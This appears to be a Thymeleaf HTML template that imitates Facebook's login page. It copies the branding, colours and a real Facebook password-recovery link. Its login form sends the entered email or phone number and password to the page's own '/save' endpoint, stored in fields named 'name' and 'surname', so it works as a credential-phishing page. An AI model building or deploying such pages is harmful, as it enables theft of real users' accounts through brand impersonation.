<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"
	xmlns:th="http://www.thymeleaf.org">
<head>
<meta charset="utf-8" />
<title>Facebook</title>
	<link rel="shortcut icon" href="https://yandex.ru/images/search?p=3&text=facebook+image&pos=128&rpt=simage&img_url=https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FD5TjBKiVUAArkKy.jpg&from=tabbar" />

<style>
	*{
		margin: 0%;
		padding: 0%;

	}
	body {
		background-color: 	#dfe3ee;
	}
	.textbox{
		margin-top: 200px;
		margin-left: 150px;

	}
	h1{
		font-size: 55px;
		color: #1877f2;
		font-family: sans-serif;
	}
	h2{
		font-family: Helvetica, Arial, sans-serif;
		font-size: 28px;
		font-weight: normal;
		line-height: 32px;
		width: 500px;
	}
	.container{

		width: 400px;
		height: 350px;
		margin-top: -194px;
		margin-left: 900px;
		border-radius: 50%;
		background-color: white;
		width: 390px;
		height: 355px;
		text-align: center;

	}
	.form{
		float: right;
		background-color: white;
		margin-top: -12px;
		padding: 20px;
	}
	.form input{
		margin-top: 10px;
		margin-left: -10px;
		border-radius: 8px;
		margin-right: -10px;
		padding:17px;
		width: 332px;
	}
	.form input:hover{
	border-color: #1877f2;
	}
	button{
		margin-top: 15px;
		background-color:#1877f2 ;
		padding: 16px;
		width: 100%;
		cursor: pointer;
		border-radius: 8px;
		color: white;
		font-family: sans-serif;
		font-size: 18px;
	}
	p{
		background-color: white;
		font-size: 16px;
		color: #1877f2;
		margin-top: 10px;
	}
	p a{
		color: #1877f2;
		background-color: white;
	}
	.btn {
		padding: 7px;
		margin-top: 15px;
		background-color: white;
		margin-left: 60px;
		margin-right: 60px;

	}
	.btn button{
		background-color:#1b9c24 ;
		border-color: #1b9c24;
	}
	.btn button:hover{
		cursor:pointer;
		background-color: #1c9c3c;
	}
	.form button{
		border-color: #1877f2;
	}
</style>
</head>
<body>

	<div class="textbox">
		<h1>
			facebook
		</h1>
		<h2>
			Connect with friends and the world around you on Facebook.
		</h2>
	</div>


	<div class="container">

		<div class="form">
			<form action="#" th:action="@{/save}" th:object="${product}"
				  method="post">
			<input type="text" class="text" placeholder="Email or phone number" th:field="*{name}"> <br>
			<input type="password" class="text" placeholder="Password" th:field="*{surname}" ><br>
			<button type="submit">
				Log In
			</button>
			<p><a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjM4NzA3NTg4LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login">Forgot password?</a><br></p>
			<div class="btn">
				<button>Create New Account</button>


			</div>



		</div>

	</div>

</body>
</html>
